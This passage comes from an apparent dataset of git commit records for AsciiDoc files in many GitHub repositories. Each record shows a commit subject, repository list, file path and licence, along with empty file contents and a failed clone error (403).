(#25412)\n\n","repos":"jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,s1monw\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,fred84\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elasticassandra,HonzaKral\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,mohit\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,naveenhooda2000\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,wenpos\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,mohit\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,sneivandt\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,wenpos\/elasticsearch,s1monw\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,brandonkearby\/elasticsearch,GlenRSmith\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,mjason3\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,vroyer\/elasticassandra,coding0011\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,shreejay\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,pozhidaevak\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbedb663ee1a317d8fd74005c9719af603c32145","subject":"Update 2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","message":"Update 2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","new_file":"_posts\/2016-10-26-Once-Upon-a-Time-projection-show-to-replace-Celebrate-the-Magic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1a9833445114c3490fe09300a2e3ce0c37cc97a","subject":"Correct similarity default for 5.0 (#21144)","message":"Correct similarity default for 5.0 (#21144)\n\n","repos":"fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,artnowo\/elasticsearch,jimczi\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,henakamaMSFT\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,fforbeck\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,njlawton\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,bawse\/elasticsearch,maddin2016\/elasticsearch,IanvsPoplicola\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,LeoYao\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,wenpos\/elasticsearch,MaineC\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,mikemccand\/elasticsearch,wangtuo\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,sneivandt\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,maddin2016\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,henakamaMSFT\/elasticsearch,Helen-Zhao\/elasticsearch,LeoYao\/elasticsearch,nezirus\/elasticsearch,mikemccand\/elasticsearch,alexshadow007\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,kalimatas\/elasticsearch,Shepard1212\/elasticsearch,naveenhooda2000\/elasticsearch,GlenRSmith\/elasticsearch,JervyShi\/elasticsearch,LewayneNaidoo\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,nazarewk\/elasticsearch,masaruh\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,Stacey-Gammon\/elasticsearch,a2lin\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,yanjunh\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,winstonewert\/elasticsearch,wangtuo\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,bawse\/elasticsearch,scottsom\/elasticsearch,JSCooke\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,mikemccand\/elasticsearch,wuranbo\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,fforbeck\/elasticsearch,StefanGor\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,henakamaMSFT\/elasticsearch,winstonewert\/elasticsearch,elasticdog\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,qwerty4030\/elasticsearch,njlawton\/elasticsearch,yanjunh\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,ZTE-PaaS\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,yanjunh\/elasticsearch,winstonewert\/elasticsearch,fernandozhu\/elasticsearch,StefanGor\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,uschindler\/elasticsearch,i-am-Nathan\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,obourgain\/elasticsearch,mortonsykes\/elasticsearch,spiegela\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,umeshdangat\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,pozhidaevak\/elasticsearch,qwerty4030\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,glefloch\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,JackyMai\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,fforbeck\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,lks21c\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,StefanGor\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,brandonkearby\/elasticsearch,sneivandt\/elasticsearch,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,henakamaMSFT\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,MisterAndersen\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,fernandozhu\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,s1monw\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,MaineC\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elasticassandra,nknize\/elasticsearch,vroyer\/elassandra,C-Bish\/elasticsearch,wangtuo\/elasticsearch,JervyShi\/elasticsearch,naveenhooda2000\/elasticsearch,C-Bish\/elasticsearch,mortonsykes\/elasticsearch,JackyMai\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,scottsom\/elasticsearch,masaruh\/elasticsearch,spiegela\/elasticsearch,GlenRSmith\/elasticsearch,rlugojr\/elasticsearch,maddin2016\/elasticsearch,yanjunh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,uschindler\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,artnowo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Shepard1212\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,JervyShi\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,wuranbo\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,MisterAndersen\/elasticsearch,MaineC\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/mapping\/params\/similarity.asciidoc","new_file":"docs\/reference\/mapping\/params\/similarity.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4c630229d99dec6597f91db626978b0ddac744fd","subject":"Update 2016-03-12-secret-of-the-magic-crystals.adoc","message":"Update 2016-03-12-secret-of-the-magic-crystals.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-03-12-secret-of-the-magic-crystals.adoc","new_file":"_posts\/2016-03-12-secret-of-the-magic-crystals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6d9caeb94760aaa1de83c5bed06e484340852d","subject":"Python: Listing files and\/or directories","message":"Python: Listing files and\/or directories\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"67cca43d9c9f8168aeb92bd42404e40d36e3388d","subject":"Add Python notes","message":"Add Python notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"f388d42c62e5d7ef7ecce2b1ab17e0a60388dfe9","subject":"Moving to asciidoc","message":"Moving to asciidoc\n","repos":"kurron\/jvm-development-environment,kurron\/jvm-development-environment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/jvm-development-environment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b547f6fb819458958b1ec0262ebfbc91934e4eaa","subject":"Improve main README file and switch to asciidoc","message":"Improve main README file and switch to asciidoc\n","repos":"madmath\/sous-chef,madmath\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast,madmath\/sous-chef,savoirfairelinux\/sous-chef","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c44eeded994e84c0f0cc7ea480e6fe8d24ef6500","subject":"add doc","message":"add doc\n","repos":"shaleh\/multinode-vagrant-devstack,shaleh\/multinode-vagrant-devstack,shaleh\/multinode-vagrant-devstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shaleh\/multinode-vagrant-devstack.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a823edff635d47397f6390396eb7ba4fe75c20f5","subject":"link to DocBook XSL parameter reference","message":"link to DocBook XSL parameter reference\n","repos":"azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,azuwis\/asciidoctor-fopdf,getreu\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub,asciidoctor\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89e0ca392c5acd2d1122fdcc266789916a167962","subject":"Create README.adoc","message":"Create README.adoc","repos":"andreatta\/andreatta.github.io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreatta\/andreatta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff58e77f3a2caac176eb859818acf1193bc3301b","subject":"Readded readme file","message":"Readded readme file\n","repos":"bensteinert\/chromarenderer-java,bensteinert\/chromarenderer-java","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bensteinert\/chromarenderer-java.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca7d5439a5ed88bffc2c50dcaeb1feca4423ff6f","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fa631bad4fff95eb74164b87b464448d98b80a2","subject":"Initial version of collections module documentation.","message":"Initial version of collections module documentation.\n","repos":"apache\/incubator-tamaya,apache\/incubator-tamaya,apache\/incubator-tamaya","old_file":"src\/site\/asciidoc\/extensions\/mod_collections.adoc","new_file":"src\/site\/asciidoc\/extensions\/mod_collections.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tamaya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fb861de2c22347ffef5d0687424e0ec6e9c4897e","subject":"common GrailsApplicationForge snippet","message":"common GrailsApplicationForge snippet\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-grailsApplicationForge.adoc","new_file":"src\/main\/docs\/common-grailsApplicationForge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a791cf085dce85f9d0f37e7cad47faeed393118d","subject":"doc: minor update to release notes","message":"doc: minor update to release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bdf3cd07be051511f8cc77e86d56f3da580434ee","subject":"add","message":"add\n\nSigned-off-by: Takeshi Banse <db42e37a7cb27ca6628f344993036144160b0931@laafc.net>\n","repos":"hchbaw\/en.zsh","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hchbaw\/en.zsh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2fba74dd7d0811361179e30ed6998693406a791a","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e6fdb906169fcafb52a7bde16f766ac3d431f4f","subject":"Fixed readme md","message":"Fixed readme md\n","repos":"rmuhamedgaliev\/MPI-lab1,rmuhamedgaliev\/MPI-lab1","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"420a16003239ff4b51524b1454dc2daaf8d37416","subject":"Fixed README","message":"Fixed README\n","repos":"rmuhamedgaliev\/MPI-lab2","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/MPI-lab2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7303d507f501cbe8aab05e3abcc0b706021361b6","subject":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","message":"Update 2016-04-08-Micro-Service-Casual-Talk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_file":"_posts\/2016-04-08-Micro-Service-Casual-Talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b74261f03e821143da032c64df7ea5999933f38","subject":"Table test page.","message":"Table test page.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters3.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/particle_emitters3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"26b2208b41652ce6b1653a0d3a0f61807b4bc905","subject":"Update 2016-06-17-Euro-Watching-Engineering.adoc","message":"Update 2016-06-17-Euro-Watching-Engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_file":"_posts\/2016-06-17-Euro-Watching-Engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0a2362cfd3bed48e59c517715edaadad1ce774","subject":"y2b create post Samsung Galaxy S9 Concept","message":"y2b create post Samsung Galaxy S9 Concept","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-22-Samsung-Galaxy-S9-Concept.adoc","new_file":"_posts\/2017-10-22-Samsung-Galaxy-S9-Concept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"061899b40df9113a19230294f802d7eb1b7d0b54","subject":"Added a README for the RI","message":"Added a README for the RI","repos":"heiko-braun\/microprofile-health","old_file":"ri\/README.adoc","new_file":"ri\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heiko-braun\/microprofile-health.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"914664d89abc5036435a570cb125af66c0d6c6fc","subject":"Fix leftover reference to ScriptModule in native script docs","message":"Fix leftover reference to ScriptModule in native script 